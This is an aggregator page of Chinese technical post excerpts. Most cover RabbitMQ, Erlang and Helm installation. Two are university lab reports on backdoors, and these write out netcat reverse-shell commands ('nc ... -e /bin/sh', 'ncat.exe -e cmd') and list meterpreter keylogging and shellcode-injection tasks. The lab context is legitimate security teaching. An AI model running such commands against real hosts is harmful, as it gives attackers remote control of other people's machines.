Socat

(1)RabbitMQ简介与安装

耗尽温柔 提交于 2020-08-19 22:16:06
1.RabbitMQ简介 因为RabbitMQ是基于开源的AMQP协议来实现的,所以在了解MQ时候,首先我们来了解下AMQP协议。AMQP,即Advanced Message Queuing Protocol,一个提供统一消息服务的应用层标准高级消息队列协议,是应用层协议的一个开放标准,为面向消息的中间件设计。基于此协议的客户端与消息中间件可传递消息,并不受客户端或者中间件不同产品、不同的开发语言等条件的限制,也就是说消息生产者无需知道消费者如何处理消息结果,反之亦然,解耦了组件跟组件依赖。RabbitMQ服务器端用Erlang语言编写,同时也支持多种客户端来开发跨语言消息传递,例如:Java,.NET,PHP,Python,JavaScript,Ruby,Go等。RabbitMQ还支持多种消息传递协议、消息排队、传递确认、队列的灵活路由、多种交换类型。还支持分布式集群以实现高可用性和吞吐量。适用于排队算法、秒杀活动、消息分发、异步处理、数据同步、处理耗时任务、CQRS等应用场景。还可以通过HTTP-API命令行工具和用于管理和监视RabbitMQ的UI。 2.RabbitMQ在CentOS 7安装 因为我对Linux运维知识面比较薄弱,所以在Linux上部署RabbitMQ这块暂时不想耗太多时间在这上面去(后续有时间再深入了解),这里我完全是跟着园区Net大神晓晨大佬这篇文章

2019-2020-2 网络对抗技术 20174326旦增列错 Exp2 后门原理与实践

本秂侑毒 提交于 2020-08-15 22:08:45
2019-2020-2 网络对抗技术 20174326旦增列错 Exp2 后门原理与实践 目录 一、实验介绍 二、实验准备 三、实验过程 任务一:使用netcat实现windows,linux之间的后门连接 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:MFS meterpreter生成后门程序,并注入被控端进行远程控制 任务四:使用MSF meterpreter生成获取目标主机音频、击键记录等内容 任务五:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell 四、实验要求 五、实验感想 一、实验介绍 1.后门原理概念 后门就是不通过正常认证流程而非法访问操作系统的通道,一般编译器、操作系统、应用程序中都可能留有后门。 2.后门操作流程 获取常用后门程序,如netcat系列、meterpreter、intersect等 通过软件程序自带、诱骗下载、恶意攻击等方式将后门植入电脑系统中 通过开机自启动、win的定时任务、linux的cron服务或诱骗用户点击等方式进行成功运行 避免被恶意代码检测程序发现,躲避恶意代码免杀技术 传送数据时避免被本机或网络的防火墙发现(反弹式连接、加密连接、隧道技术) 二、实验准备 1.常用后门工具——NC netcat,又名nc、ncat,是一个底层工具,进行基本的TCP UDP数据收发

CentOS 7 yum安装 RabbitMQ

主宰稳场 提交于 2020-08-10 15:47:38
CentOS 7 yum安装 RabbitMQ tom马 2019-07-11 16:41:24 1929 收藏 4 展开 1、下载erlang wget http://www.rabbitmq.com/releases/erlang/erlang-19.0.4-1.el7.centos.x86_64.rpm 2、安装erlang rpm -ivh erlang-19.0.4-1.el7.centos.x86_64.rpm 测试erlang [root@centos7 src]# erl Erlang/OTP 19 [erts-8.0.3] [source] [64-bit] [async-threads:10] [hipe] [kernel-poll:false] Eshell V8.0.3 (abort with ^G) 1> 3、下载rabbitmq wget http://www.rabbitmq.com/releases/rabbitmq-server/v3.6.6/rabbitmq-server-3.6.6-1.el7.noarch.rpm 4、安装rabbitmq rpm -ivh rabbitmq-server-3.6.6-1.el7.noarch.rpm #错误:依赖检测失败:socat 被 rabbitmq-server-3.6.6-1.el7.noarch

[kubernetes]helm安装

☆樱花仙子☆ 提交于 2020-08-06 13:46:44
下载 HELM_VERSION= ${K8S_VERSION:-"2.11.0"} HELM= "helm-v ${HELM_VERSION}-linux-amd64" curl -L https://storage.googleapis.com/kubernetes-helm/ $HELM.tar.gz -o $HELM.tar.gz tar -xvzf $HELM.tar.gz -C /tmp mv /tmp/linux-amd64/helm /usr/ local/bin/helm 2、验证安装 helm version [apps@mvxl1484 ~]$ helm version Client: &version.Version{SemVer:"v2.11.0", GitCommit:"2e55dbe1fdb5fdb96b75ff144a339489417b146b", GitTreeState:"clean"} Error: could not find tiller    3、安装tiller。首先搜索tiller docker search tiller [apps@mvxl1484 k8s]$ docker search tiller NAME DESCRIPTION STARS OFFICIAL AUTOMATED sapcc/tiller Mirror of

Centos7安装RabbitMQ最新版3.8.5,史上最简单实用安装步骤

白昼怎懂夜的黑 提交于 2020-08-05 05:55:21
一、系统环境 1、JDK1.8 2、Centos7-64位 3、Erlang-OTP 23 4、RabbitMQ-3.8.5 二、安装Erlang 1、 erlang和rabbitmq的版本对应关系 2、通过rpm安装erlang 1) 完成erlang的前置条件配置 curl -s https://packagecloud.io/install/repositories/rabbitmq/erlang/script.rpm.sh | sudo bash 2)安装erlang yum install -y erlang 3)检查erlang的版本号 erl 4)erlang安装完成 三、安装RabbitMQ 1、先导入两个key rpm --import https://packagecloud.io/rabbitmq/rabbitmq-server/gpgkey rpm --import https://packagecloud.io/gpg.key 没报错就表示正常。 2、 完成RabbitMQ的前置条件配置 curl -s https://packagecloud.io/install/repositories/rabbitmq/rabbitmq-server/script.rpm.sh | sudo bash 3、下载RabbitMQ安装包 注意看CentOS的版本,6,7

how to listen both udp and tcp from the same port?

感情迁移 提交于 2020-07-08 00:50:06
问题 I am using socat server - > socat TCP-LISTEN:4444 STDOUT || socat UDP:LISTEN:4444 STDOUT client - > socat - UDP:localhost:4444 When I try to connect with udp, I cannot connect, but it happens with tcp. what should I do? ,where is the mistake? 回答1: A quick look of the socat man page shows UDP:LISTEN doesn't make sense. It looks like you want: socat TCP-LISTEN:4444 STDOUT || socat UDP-LISTEN:4444 STDOUT You have a typo, colon instead of hyphen. 来源: https://stackoverflow.com/questions/62659700

2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

僤鯓⒐⒋嵵緔 提交于 2020-05-06 03:09:02
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Meterpreter 实验内容 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 任务五:可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell 实验遇到的问题及解决方法 实验总结与体会 一、后门的概念 后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法 二、基础问题回答 问:例举你能想到的一个后门进入到你系统中的可能方式? 当我们打开一个木马网页时,会自动安装木马,生成可执行文件,以此在系统留下后门。 黑客利用系统自身的某个服务或者线程,将后门程序插入到其中 问:例举你知道的后门如何启动起来(win及linux)的方式? Windows:设置为开机自启动、修改注册表项 Linux

2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

强颜欢笑 提交于 2020-05-06 03:08:48
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat,然后各使用netcat互相攻击一次。最后使用在linux用cron设置一个定时启动。 (2)使用socat获取主机Shell, 任务计划启动 与第一个区别在于,第二个虚拟机使用Windows的任务计划启动一次,设置一个定时启动。 (3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。 可执行文件就是后门程序。利用ncat或socat传送如果不行,复制粘贴也可以。 (4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。 这个就是获取shell以后的阶段,很有意思了。 (5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell加分内容一并写入本实验报告。 这个不是很懂。。。也暂时没有做,过段时间看看别人的,问题不大。 2.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 一个是通过U盘硬盘这种可移动设备,如果写一个AutoRun.inf,插上以后就会自动运行后门。 二是盗版软件,破解工具。实际上这可能是无法避免的

2018-2019-2 网络对抗技术 20165230 Exp2 后门原理与实践

谁说我不能喝 提交于 2020-05-06 03:08:33
[toc] <font size=3> 1.实验内容 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell 2.基础问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在下载的软件中 邮箱附件、网站链接 注入在可执行文件里 注入在office文件的宏里面 2.例举你知道的后门如何启动起来(win及linux)的方式? 更改名字伪装成其他程序,一点击即启动 Linux可以通过cron启动 Windows下通过任务计划、开机自启动、修改注册表项来启动后门程序 3.Meterpreter有哪些给你映像深刻的功能? 获取摄像头权限进行拍照、录像 获取麦克风权限进行录音 获取键盘输入 提升用户权限 4.如何发现自己有系统有没有被安装后门? 安装杀毒软件并进行扫描 观察进程以及端口,看看有没有异常开放的端口 查看开机自启动向、注册表项中有无异常 3.常用后门工具实践 3.1netcat Windows获得Linux

20155216 Exp2 后门原理与实践

冷暖自知 提交于 2020-05-06 01:45:41
后门原理与实践 实验内容: 常用后门工具 NC 或 netcat netcat是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。 Linux: 一般自带netcat,"man netcat" 或"man nc"可查看其使用说明。 Win获得Linux Shell 1、windows 打开监听 先解压ncat.rar,使用Dos命令行,进入ncat文件夹运行可执行文件ncat.exe。使用 ncat.exe -l -p 5216 使5216端口处于监听状态。 2、Linux反弹连接win 使用ipconfig查询主机IP地址。 使用 nc 192.168.1.104 5216 -e /bin/sh 。 3、windows下获得一个linux shell 可运行任何指令,如ls: Linux获得Win Shell 1、Linux运行监听指令 Linux下输入命令 nc -l -p 5216 。 2、.Windows反弹连接Linux 使用 ifconfig 查看Linux的IP地址。 使用Dos命令行输入 ncat.exe -e cmd.192.168.253.128 5216 。 3.Linux下看到Windows的命令提示 Netcat扩展知识 nc传输数据 1、Windows下监听5216端口: ncat.exe -l -p 5216 。